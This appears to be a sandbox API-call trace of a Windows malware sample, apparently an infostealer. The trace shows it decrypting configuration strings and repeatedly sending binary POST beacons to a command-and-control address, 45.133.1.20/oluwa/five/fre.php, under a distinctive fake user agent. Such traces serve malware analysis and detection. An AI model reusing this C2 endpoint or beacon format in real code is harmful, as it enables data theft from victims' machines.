[0278.630] GetProcessHeap () returned 0x6a0000 [0278.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0278.630] GetProcessHeap () returned 0x6a0000 [0278.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.631] GetProcessHeap () returned 0x6a0000 [0278.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0278.631] GetProcessHeap () returned 0x6a0000 [0278.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0278.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17a0) returned 0xa0c [0278.633] Sleep (dwMilliseconds=0xea60) [0278.635] GetProcessHeap () returned 0x6a0000 [0278.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0278.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.636] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.644] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0278.655] GetProcessHeap () returned 0x6a0000 [0278.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0278.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.656] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0278.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.737] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.738] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.738] GetProcessHeap () returned 0x6a0000 [0278.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0278.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.743] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0278.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.745] CryptDestroyKey (hKey=0x6ad020) returned 1 [0278.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.746] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0278.746] GetProcessHeap () returned 0x6a0000 [0278.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.748] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.749] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.751] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.752] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.752] GetProcessHeap () returned 0x6a0000 [0278.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0278.752] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.752] GetProcessHeap () returned 0x6a0000 [0278.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0278.753] GetProcessHeap () returned 0x6a0000 [0278.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.754] GetProcessHeap () returned 0x6a0000 [0278.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0278.754] GetProcessHeap () returned 0x6a0000 [0278.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0278.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.782] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0278.793] GetProcessHeap () returned 0x6a0000 [0278.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0278.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.794] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0278.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.796] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.797] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.797] GetProcessHeap () returned 0x6a0000 [0278.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0278.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.799] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0278.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.800] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0278.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.801] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0278.802] GetProcessHeap () returned 0x6a0000 [0278.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.803] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0278.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.804] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0278.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.805] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0278.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.806] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0278.809] GetProcessHeap () returned 0x6a0000 [0278.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0278.810] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0278.810] GetProcessHeap () returned 0x6a0000 [0278.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0278.810] socket (af=2, type=1, protocol=6) returned 0xa10 [0278.810] connect (s=0xa10, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0278.838] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0278.838] GetProcessHeap () returned 0x6a0000 [0278.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0278.838] GetProcessHeap () returned 0x6a0000 [0278.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0278.839] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0278.841] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.841] GetProcessHeap () returned 0x6a0000 [0278.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b99f0 [0278.841] GetProcessHeap () returned 0x6a0000 [0278.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0278.842] GetProcessHeap () returned 0x6a0000 [0278.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0278.842] GetProcessHeap () returned 0x6a0000 [0278.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0278.843] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0278.844] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.844] GetProcessHeap () returned 0x6a0000 [0278.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0278.844] GetProcessHeap () returned 0x6a0000 [0278.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0278.844] send (s=0xa10, buf=0x6bd460*, len=242, flags=0) returned 242 [0278.845] send (s=0xa10, buf=0x6bb998*, len=159, flags=0) returned 159 [0278.845] GetProcessHeap () returned 0x6a0000 [0278.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0278.845] recv (in: s=0xa10, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0278.922] GetProcessHeap () returned 0x6a0000 [0278.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0278.924] GetProcessHeap () returned 0x6a0000 [0278.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0278.924] GetProcessHeap () returned 0x6a0000 [0278.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b99f0 | out: hHeap=0x6a0000) returned 1 [0278.924] GetProcessHeap () returned 0x6a0000 [0278.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0278.925] closesocket (s=0xa10) returned 0 [0278.925] GetProcessHeap () returned 0x6a0000 [0278.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0278.925] GetProcessHeap () returned 0x6a0000 [0278.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.926] GetProcessHeap () returned 0x6a0000 [0278.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0278.926] GetProcessHeap () returned 0x6a0000 [0278.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0278.927] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17a8) returned 0xa10 [0278.929] Sleep (dwMilliseconds=0xea60) [0278.930] GetProcessHeap () returned 0x6a0000 [0278.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0278.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.932] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.946] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0278.954] GetProcessHeap () returned 0x6a0000 [0278.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0278.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.957] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0278.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.958] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.968] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.968] GetProcessHeap () returned 0x6a0000 [0278.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0278.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.969] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0278.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.970] CryptDestroyKey (hKey=0x6ad020) returned 1 [0278.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.971] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0278.971] GetProcessHeap () returned 0x6a0000 [0278.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0278.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.972] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.974] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.975] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.975] GetProcessHeap () returned 0x6a0000 [0278.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0278.975] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.975] GetProcessHeap () returned 0x6a0000 [0278.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0278.976] GetProcessHeap () returned 0x6a0000 [0278.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0278.976] GetProcessHeap () returned 0x6a0000 [0278.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0278.977] GetProcessHeap () returned 0x6a0000 [0278.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0278.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.978] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0278.991] GetProcessHeap () returned 0x6a0000 [0278.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0278.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.992] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0278.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.993] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.994] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.994] GetProcessHeap () returned 0x6a0000 [0278.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0278.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.996] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0278.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0278.997] CryptDestroyKey (hKey=0x6ad520) returned 1 [0278.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.000] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0279.000] GetProcessHeap () returned 0x6a0000 [0279.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.001] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0279.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.002] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0279.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.003] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0279.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.004] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0279.004] GetProcessHeap () returned 0x6a0000 [0279.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0279.004] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0279.004] GetProcessHeap () returned 0x6a0000 [0279.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0279.004] socket (af=2, type=1, protocol=6) returned 0xa14 [0279.005] connect (s=0xa14, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0279.029] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0279.029] GetProcessHeap () returned 0x6a0000 [0279.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0279.029] GetProcessHeap () returned 0x6a0000 [0279.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0279.030] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.032] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0279.032] GetProcessHeap () returned 0x6a0000 [0279.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0279.032] GetProcessHeap () returned 0x6a0000 [0279.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0279.033] GetProcessHeap () returned 0x6a0000 [0279.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0279.033] GetProcessHeap () returned 0x6a0000 [0279.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0279.034] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.034] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0279.034] GetProcessHeap () returned 0x6a0000 [0279.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0279.034] GetProcessHeap () returned 0x6a0000 [0279.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0279.035] send (s=0xa14, buf=0x6bd460*, len=242, flags=0) returned 242 [0279.035] send (s=0xa14, buf=0x6bb998*, len=159, flags=0) returned 159 [0279.035] GetProcessHeap () returned 0x6a0000 [0279.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0279.036] recv (in: s=0xa14, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0279.113] GetProcessHeap () returned 0x6a0000 [0279.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0279.114] GetProcessHeap () returned 0x6a0000 [0279.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0279.115] GetProcessHeap () returned 0x6a0000 [0279.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0279.115] GetProcessHeap () returned 0x6a0000 [0279.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0279.115] closesocket (s=0xa14) returned 0 [0279.116] GetProcessHeap () returned 0x6a0000 [0279.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0279.116] GetProcessHeap () returned 0x6a0000 [0279.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0279.116] GetProcessHeap () returned 0x6a0000 [0279.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0279.117] GetProcessHeap () returned 0x6a0000 [0279.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0279.117] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17ac) returned 0xa14 [0279.121] Sleep 